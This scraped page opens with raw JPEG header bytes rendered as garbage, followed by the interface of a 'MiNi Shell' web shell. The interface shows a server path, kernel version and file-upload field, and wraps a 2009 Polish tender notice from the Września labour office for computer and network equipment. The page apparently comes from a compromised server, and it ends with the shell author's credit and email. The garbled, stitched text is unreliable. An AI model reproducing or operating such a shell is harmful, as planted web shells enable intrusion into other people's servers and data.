JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091002/344088-N-2009.html

<p class="kh_header"><b>Września: dostawa serwera komputerowego oraz urządzeń komputerowych i sieciowych do Powiatowego Urzędu Pracy we Wrześni przy ul. Wojska Polskiego 2</b><br>
<b>Numer ogłoszenia: 344088 - 2009; data zamieszczenia: 02.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy we Wrześni , ul. Wojska Polskiego 2, 62-300 Września, woj. wielkopolskie, tel. 061 6403535, faks 061 6402110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupwrzesnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa serwera komputerowego oraz urządzeń komputerowych i sieciowych do Powiatowego Urzędu Pracy we Wrześni przy ul. Wojska Polskiego 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa serwera komputerowego oraz urządzeń komputerowych i sieciowych do Powiatowego Urzędu Pracy we Wrześni przy ul. Wojska Polskiego 2. Zamówienie będzie realizowane w następujących częściach:

      I	Serwer, macierz i urządzenie utm:
Serwer komputerowy - 1 szt. (kod CPV-48822000-6),
Macierz dyskowa - 1 szt.  (kod CPV-30233141-1), 
Rozbudowa serwera HP ML 370 G4: 
- pamięć RAM dedykowana 4x Memory Kit (2x2048MB) (kod CPV 30236110-6), 
- karta HBA- 1 szt. (kod CPV-30233190-9),
Urządzenie sieciowe klasy UTM - 1 szt. (kod CPV-32427000-2),
Szafa teleinformatyczna 24U - 1szt. (kod CPV -30211200-3).
     II	Zestawy komputerowe, komputer osobisty i punkt dostępowy:
Zestawy komputerowe - 6 szt. (kod CPV-30213300-8, 30231300-0),
Zestawy komputerowe #2 - 2 szt.  (kod CPV - 30213300-8),
Komputer osobisty - 1 szt. (kod CPV- 30213000-5),
Punkt dostępowy  - 1 szt. (kod CPV-32420000-3).
    III	Drukarki i urządzenie wielofunkcyjne: 
drukarki laserowe -  2 szt. (kod CPV-30232110-8), 
drukarka atramentowa - 1 szt. (kod CPV- 30232130-4 ), 
urządzenie wielofunkcyjne - 1 szt. (kod CPV-30232110-8).
 
Każda ze wskazanych powyżej części Zamówienia określana będzie dalej mianem Zadania.
Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 4 do Specyfikacji.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 48.82.20.00-6, 30.20.00.00-1, 32.42.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia publicznego mogą się ubiegać wykonawcy, którzy spełnią warunki określone w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych tj.:
a)	posiadają uprawnienia do wykonywania  określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania  zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.	Ocena spełniania warunków określonych dla wykonawców, będzie dokonywana  na podstawie analizy dokumentów i oświadczeń, które zamawiający określił w SIWZ, przy zastosowaniu kryterium : spełnia, nie spełnia.
3.	Wykonawca, który nie spełnia warunków określonych przepisami art. 24 ustawy, zostanie wykluczony z ubiegania się  o udzielenie zamówienia publicznego.
4.	Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta powinna zawierać następujące dokumenty i oświadczenia:
1.	Oświadczenie że wykonawca spełnia wymogi określone w art. 22 ust. 1 pkt. 1-3 ustawy Prawo Zamówień Publicznych i nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego ( wg wzoru - załącznik nr 2 do SIWZ) Oświadczenie winno być podpisane przez Wykonawcę lub osoby występujące w jego imieniu zgodnie  z przepisami prawa. W przypadku działania przez pełnomocnika firmy do oferty należy dołączyć pełnomocnictwo.
2.	Aktualny wypis z krajowego rejestru sądowego lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, potwierdzający dopuszczenie do obrotu prawnego w zakresie objętym zamówieniem wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 4-8 ustawy wystawionej nie wcześniej niż 6 miesięcy przed terminem składania ofert.
4.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy wystawionej nie wcześniej niż 6 miesięcy przed terminem składania ofert.
5.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca  nie zalega  z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności  lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6.	Wykaz co najmniej 3 dostaw wykonanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot  zamówienia (co najmniej o wartości wyrażonej w kwocie netto określonej przez Wykonawcę w ofercie), wg wzoru stanowiącego załącznik nr 3 do SIWZ. W przypadku, gdy Wykonawca zamierza złożyć ofertę na więcej niż jedną część zamówienia, spełnienie tego warunku będzie wymagane dla każdej części osobno.
7.	Dokumenty od minimum 3 zamawiających, na rzecz których świadczono dostawy stanowiące przedmiot  zamówienia (co najmniej o wartości wyrażonej w kwocie netto określonej przez Wykonawcę w ofercie) potwierdzające, że dostawy te zostały wykonane należycie. W przypadku, gdy Wykonawca zamierza złożyć ofertę na więcej niż jedną część zamówienia, spełnienie tego warunku będzie wymagane dla każdej części osobno.
8.	Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń oraz osób zdolnych do wykonania zamówienia, jeżeli w Oświadczeniu Wykonawcy (załącznik nr 2 do specyfikacji istotnych warunków zamówienia) Wykonawca oświadczył, że przedstawi takie zobowiązanie.
9.	Polisę ubezpieczeniową, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie działalności Firmy  Wykonawcy (OC deliktowe), na sumę ubezpieczenia odpowiadającej co najmniej kwocie brutto złożonej oferty. Polisa lub inny dokument ubezpieczenia winny być aktualne (ważne) na dzień składania i otwarcia ofert. Wykonawca winien posiadać w/w ubezpieczenie przez cały okres  wykonywania zamówienia. W przypadku, gdy Wykonawca zamierza złożyć ofertę na więcej niż jedną część zamówienia polisa lub inny dokument ubezpieczenia powinny obejmować sumę ubezpieczenia odpowiadającą co najmniej kwocie brutto łącznie składanych części.
10.	Ponadto  Wykonawca ma dołączyć do oferty następujące dokumenty:
-	formularz oferty (wzór stanowi załącznik nr 1 do SIWZ),
-	formularz asortymentowo - cenowy - załącznik nr 5 do SIWZ,
-	opis techniczny przedmiotu zamówienia - załącznik nr 6 do SIWZ..
W przypadku, gdy Wykonawca złoży ofertę na więcej niż jedną część zamówienia wymienione wyżej dokumenty należy załączyć dla każdej części osobno.

Jeżeli wykonawca ma siedzibę  lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
1)	zamiast dokumentów wymienionych w pkt 2,4,5 - składa dokument  lub dokumenty wystawione w kraju w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne  albo, że  uzyskał prawem przewidziane zwolnienie, odroczenie lub   rozłożenie  na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
2)	zamiast dokumentów wymienionych w pkt 3  - składa zaświadczenie właściwego  organu sądowego  lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
Dokumenty wystawione zamiast dokumentów o których mowa  pkt 2, 3 i 4  powinny być wystawione nie wcześniej niż 6 miesięcy  przed upływem  terminu składania ofert. Dokument, wystawiony zamiast dokumentu o którym mowa w pkt 5  wystawiony powinien być nie wcześniej niż 3 miesiące przed terminem składania ofert.

Jeżeli  w kraju pochodzenia  osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się  dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem  sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego  odpowiednio kraju pochodzenia  osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
Wszystkie wymienione wyżej dokumenty winny być składane w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Zamawiający może zażądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wyłącznie wtedy, gdy przedstawiona przez Wykonawcę kserokopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości, a Zamawiający nie może sprawdzić jej prawdziwości w inny sposób.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pupwrzesnia.pl - zakładka Zamówienia publiczne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy we Wrześni, ul. Wojska Polskiego 2, 62-300 Września - pok. nr 13 (sekretariat).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2009 godzina 11:00, miejsce: Powiatowy Urząd Pracy we Wrześni, ul. Wojska Polskiego 2, 62-300 Września - pok. nr 13 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Serwer, macierz i urządzenie utm.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serwer, macierz i urządzenie utm: 
Serwer komputerowy - 1 szt. (kod CPV-48822000-6),
Macierz dyskowa - 1 szt.  (kod CPV-30233141-1),
Rozbudowa serwera HP ML 370 G4: 
- pamięć RAM dedykowana 4x Memory Kit (2x2048MB) (kod CPV 30236110-6), 
- karta HBA- 1 szt. (kod CPV-30233190-9)
Urządzenie sieciowe klasy UTM - 1 szt. (kod CPV-32427000-2),
Szafa teleinformatyczna 24U - 1szt. (kod CPV -30211200-3),
Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 4 do niniejszej Specyfikacji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.82.20.00-6, 30.23.31.41-4, 30.23.61.10-6, 30.23.31.90-9, 32.42.70.00-2, 30.21.12.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zestawy komputerowe, komputer osobisty i punkt dostępowy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestawy komputerowe, komputer osobisty i punkt dostępowy:
Zestawy komputerowe - 6 szt. (kod CPV-30213300-8, 30231300-0),
Zestawy komputerowe #2 - 2 szt.  (kod CPV - 30213300-8),
Komputer osobisty - 1 szt. (kod CPV- 30213000-5),
Punkt dostępowy  - 1 szt. (kod CPV-32420000-3).
Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 4 do niniejszej Specyfikacji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.33.00-8, 30.21.30.00-5, 32.42.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Drukarki i urządzenie wielofunkcyjne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Drukarki i urządzenie wielofunkcyjne: 
drukarki laserowe -  2 szt. (kod CPV-30232110-8), 
drukarka atramentowa - 1 szt. (kod CPV- 30232130-4 ), 
urządzenie wielofunkcyjne - 1 szt. (kod CPV-30232110-8).
Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 4 do niniejszej Specyfikacji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8, 30.23.21.30-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com